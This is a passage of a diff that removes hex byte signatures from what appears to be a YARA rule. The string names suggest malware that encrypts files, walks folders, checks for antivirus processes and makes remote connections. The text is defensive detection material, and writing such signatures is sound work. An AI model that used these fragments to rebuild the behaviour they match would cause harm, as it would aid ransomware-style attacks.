-            83 C0 ?? 50 E8 ?? ?? ?? ?? 56 FF D3 8D 4C 24 ?? 8D 04 C5 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 56 89 44 24 ?? FF D3 8B 5C 24 ?? 8B F0 8B CB 8D 3C 36 8B D7 E8 ?? ?? ?? ?? 8D 44
-            24 ?? 8B CE 8B 74 24 ?? 50 56 68 ?? ?? ?? ?? 57 C1 E1 ?? 53 89 4C 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 FF D3 83 C0 ?? 8D 4C 24 ??
-            50 E8 ?? ?? ?? ?? 56 FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 89 44 24 ?? 33 F6 8B 44
-            24 ?? 8B FE 50 FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 ?? 8A 0C 07 80 F9
-            ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 50 47 FF D3 8B 54 24 ?? 3B F8 72 ?? 8B
-            7C 24 ?? 57 FF D3 50 FF 74 24 ?? 6A ?? 57 56 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ??
-            8D 54 24 ?? 89 74 24 ?? 8B CF E8 ?? ?? ?? ?? 59 85 C0 75 ?? 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 85 C9 74
-            ?? 8B 45 ?? 89 08 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 33 F6 46 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B
-            C6 5E 5B 8B E5 5D C3
-        }
-		$crypt_files_v2 = {
-            8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 ?? ?? ?? ?? 52
-            FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF 74 24 ??
-            FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C0 ?? 68 ?? ?? ??
-            ?? 03 F0 56 6A ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? FF D3 8B 54 24 ?? 40 85 D2 74 ?? 3B C6 73 ?? 8D 0C 02 89 44 24 ?? 89 4C
-            24 ?? 89 54 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 40 83 7C 24 ?? ?? 74 ?? 03
-            44 24 ?? 3B C6 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 F6 FF D3 85 C0 74 ?? 8B
-            7C 24 ?? EB ?? 8D 9B ?? ?? ?? ?? 8B 4C 24 ?? 8A 04 0E 3C ?? 74 ?? 3C ?? 74 ?? 88 07
-            47 51 46 FF D3 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C
-            24 ?? 90 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24
-            ?? 3B F0 72 ?? 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 56 FF 15 ?? ??
-            ?? ?? 8D 4C 24 ?? 8D 34 46 56 89 74 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 57 8B 3D ?? ?? ?? ?? FF D7 68 ?? ?? ?? ?? 6A ?? 56 FF D7 8B 74 24 ?? 68 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 FF D7 FF 74 24 ?? 8D 34 46 FF D3 50 56
-            6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? 68 ?? ?? ?? ??
-            56 FF 15 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 8D 34 46 FF D3 50 56 6A ?? 57 6A ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24
-            ?? 8B 35 ?? ?? ?? ?? FF D6 8B F8 6A ?? C1 E7 ?? 68 ?? ?? ?? ?? 83 C7 ?? 57 6A ?? FF
-            15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D6 8D 0C C5 ?? ?? ?? ?? 8B 44 24 ?? 85 C0
-            74 ?? 3B CF 73 ?? 8B F8 EB ?? 33 FF FF 74 24 ?? FF D6 8B 0D ?? ?? ?? ?? 89 44 24 ??
-            85 C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF D6 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 34 00
-            8B D6 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57
-            68 ?? ?? ?? ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 57 FF
-            D3 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D
-            48 ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33
-            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01
-            41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24
-            ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 51 8D 54 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 8B 44 24 ?? 50 FF D3 8B 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ??
-            6A ?? FF 74 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 66 89 03 83 FE ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8B 5D ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
-            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 75
-            ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 01 03 59 11 53
-            ?? 59 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 75 ?? 8B 45 ?? 33
-            C9 66 89 08 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files_v2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF D6 8D 85 ?? ?? ?? ?? 50
-            57 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0B 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? 5F 5E 5B
-            8B E5 5D C3 8B 5D ?? EB ?? 8D A4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 F6 85 ?? ?? ?? ?? ?? 74 ?? 68
-            ?? ?? ?? ?? 57 FF D6 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? FF 75 ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 01 03 11 53 ?? 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 35 ??
-            ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A
-            ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
-            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
-            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
-            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
-            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C3
-        }
-		$search_antivirus_processes_v2 = {
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8B F0 6A ?? 89 74 24 ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? C7 03 ??
-            ?? ?? ?? 83 FE ?? 74 ?? 53 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4B ?? 33 F6 EB
-            ?? 8D A4 24 ?? ?? ?? ?? 90 51 FF 74 B4 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 73 ?? 50
-            6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 8B 3D ?? ??
-            ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 46 8D 4B ?? 83 FE ?? 72 ?? 8B 74 24 ?? 53 56 FF
-            15 ?? ?? ?? ?? 8D 4B ?? 85 C0 75 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ??
-            ?? ?? 56 FF D7 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files_v2_1 = {
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? F7 D8 1B C0 40 75 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 3C 46 89 7D ?? FF D3 8D 85 ?? ??
-            ?? ?? 50 56 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0F 83 F8 ?? 75 ?? B8 ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C3 8B 7D ?? EB ?? 8D 9B ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D3 F6 85 ?? ??
-            ?? ?? ?? 74 ?? 83 7D ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 89 45 ?? 8B 47 ?? 6A ?? 89 45 ?? FF 15 ?? ?? ?? ?? 56 8B D8 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 6A ??
-            53 FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 45 ?? 8B 4D ?? EB ?? 83 BD ?? ?? ??
-            ?? ?? 0F 57 C0 66 0F 13 45 ?? 72 ?? 51 FF 75 ?? 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 89 55
-            ?? EB ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF 15 ?? ?? ??
-            ?? 8B 45 ?? 8B 4D ?? 01 0F 11 47 ?? 8B 45 ?? 3B 47 ?? 77 ?? 72 ?? 8B 45 ?? 3B 07 73
-            ?? 8B 45 ?? FF 00 8B 1D ?? ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33
-            C0 5B 8B E5 5D C3
-        }
-		$crypt_files_v2_1 = {
-            FF 15 ?? ?? ?? ?? 33 D2 89 44 24 ?? 89 44 24 ?? 8D 0C B7 8D 0C CD ?? ?? ?? ?? 85 C0
-            74 ?? 3B CB 73 ?? 8D 3C 01 89 44 24 ?? 89 7C 24 ?? 8B D1 EB ?? 89 54 24 ?? 8B F8 8B
-            4D ?? 8D 34 CD ?? ?? ?? ?? 85 C0 74 ?? 8D 0C 32 89 4C 24 ?? 3B CB 73 ?? 8B 54 24 ??
-            8B CF 89 7C 24 ?? 03 FE 89 7C 24 ?? EB ?? 33 C9 89 4C 24 ?? 8B 74 24 ?? 85 C0 74 ??
-            8D 04 F5 ?? ?? ?? ?? 03 C2 3B C3 72 ?? 33 FF 89 7C 24 ?? 8B 1D ?? ?? ?? ?? 85 C9 0F
-            84 ?? ?? ?? ?? 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68
-            ?? ?? ?? ?? 52 FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ??
-            56 FF 74 24 ?? FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C6
-            ?? 03 C6 68 ?? ?? ?? ?? 50 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 C7
-            44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 74 24 ?? FF D3 40 85 F6 74 ?? 3B 44 24 ?? 73 ??
-            8D 0C 06 89 44 24 ?? 89 4C 24 ?? 89 74 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3
-            40 85 F6 74 ?? 03 44 24 ?? 3B 44 24 ?? 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33
-            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 8B 7C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
-            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6
-            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? EB ?? 8D 49 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
-            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 8B 1D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 56 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 3C 46 57 E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68
-            ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ??
-            FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 47
-            FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33
-            C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 66 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 58 58 8D 44 24 ?? 50 57 FF
-            D3 8B 5C 24 ?? 8B 35 ?? ?? ?? ?? 53 FF D6 6A ?? C1 E0 ?? 83 C0 ?? 68 ?? ?? ?? ?? 50
-            6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F8 53 89 7C 24 ?? FF D6 8D 04 C5 ?? ?? ?? ??
-            85 FF 74 ?? 3B 44 24 ?? 72 ?? 33 FF 53 FF D6 8B 0D ?? ?? ?? ?? 8B F0 89 74 24 ?? 85
-            C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 6A ?? 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ??
-            53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 5C 24 ?? 03 F6 8B D6 8B CB E8 ??
-            ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ??
-            ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 57 FF D3
-            6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D 48
-            ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 F6
-            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41
-            89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 ??
-            6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 7C 24 ?? 8D 54 24 ?? 6A ?? 57 8B
-            CE C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 8B 44 24 ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 68 ?? ??
-            ?? ?? 6A ?? FF 74 24 ?? FF D3 33 F6 EB ?? 8B 4C 24 ?? 85 C9 74 ?? 8B 45 ?? 89 08 8B
-            44 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74
-            24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 EB ?? 8B 7C 24 ?? 83 7C 24 ?? ??
-            75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D3 BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 74 24 ??
-            FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B C6 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v2_1 = {
-            53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 ?? ??
-            ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 FF D6
-            89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 ?? ??
-            ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
-            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3
-            0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF 15 ??
-            ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 EC ??
-            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 FF 75 ?? 8B 75 ?? 8D 4D ?? 56 E8
-            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? C7 45 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33
-            FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF
